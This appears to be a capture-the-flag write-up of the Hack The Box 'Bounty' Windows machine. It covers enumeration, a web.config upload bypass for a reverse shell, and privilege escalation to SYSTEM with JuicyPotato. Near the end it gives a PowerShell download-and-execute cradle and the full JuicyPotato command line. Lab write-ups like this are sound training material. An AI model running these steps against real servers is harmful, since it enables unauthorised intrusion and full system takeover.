Bounty machine is a deliberately vulnerable machine with Windows operating system among retired machines and it is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full port scan

As a result of the network scan, we found that port “80/tcp http Microsoft IIS httpd 7.5” is open.
We provide enumeration over this port.

We did not find any information on the web interface or in the source code. We are scanning with gobuster to detect hidden files and directories.

Here we provided file and directory scanning /aspnet_client /transfer.aspx /uploadedfiles detection
uploadedfiles/ and /aspnet_client no permission

/transfer.aspx we are going

We tried to upload a file here and it didn’t allow aspx file extension

Accepted adding png

Let’s go see if we can access the file

We were able to access the file we added
Now let’s intervene with burpsuite to see which files it accepts here and check if there is a bypass method. If we can somehow find a way to upload a file containing ASPX code to the web server, we can run the code by calling the file from the uploadedfiles directory.
I have tested ASP and ASPX extensions but both give me an “invalid file” error.
In IIS servers, .config files are important. When I tried this here it accepted it so we are looking for the .config revershell file.

We download and modify this code.

Then we create the Invoke-PowerShellTcp.ps1 web serivis that will load the target and try to listen with nc.

File uploaded successfully. Said I listen to the destination port with nc before going to the web.config file

This way we got our shell from the bounty\merlin user from the target
Here we see that the desktop directory is empty, we check for hidden files using the attrib command and we see the user flag

After getting the user flag, we tried to access the administrato user and we could not access it because we did not have authorization here.
We provide local enumeration to access ro authorizations.

Here we see that both the kernel is old and SeImpersonatePrivilege is enabled. Here we think that we will use Rotten Potato, we go and download it from github
Users running the SQL server service or IIS service usually have these privileges enabled by design. This privilege is designed to allow a service to impersonate other users on the system. Juicy Potato takes advantage of the way Microsoft handles tokens to elevate local privileges to SYSTEM.
After doanloading JuicyPotato.exe from github, we transfer it to the target machine.

Juicypotato.exe requires 3 mandatory parameters to be used.
We will focus on the -p part, which should give us a revershell. Here I will create a file called shell.bat which should give us a revershell so you should download /Invoke-PowerShellTcp.ps1 and use it.
powershell “IEX (New-Object Net.WebClient).DownloadString(‘’)”

We send this bat file to the target machine.

Now that we have passed the shell.bat file, it is time to use JuicyPotato.exe to give us the shell
.\JuicyPotato.exe -t * -p shell.bat -l 4444 -c ‘{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}’
We will use the command -t to cover all the processes, in this way -p to run shellbat, -l to run locally, and -c to write the Windows Server 2008 R2 Enterprise CLID value.
We can access the CLID value from https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2008_R2_Enterprise.

Here, before running this command, we start the web server on our local machine so that invoke can be downloaded and run, and we listen with nc

After running the command we get shell from nt authority\system user.

And that’s how we got the root flag.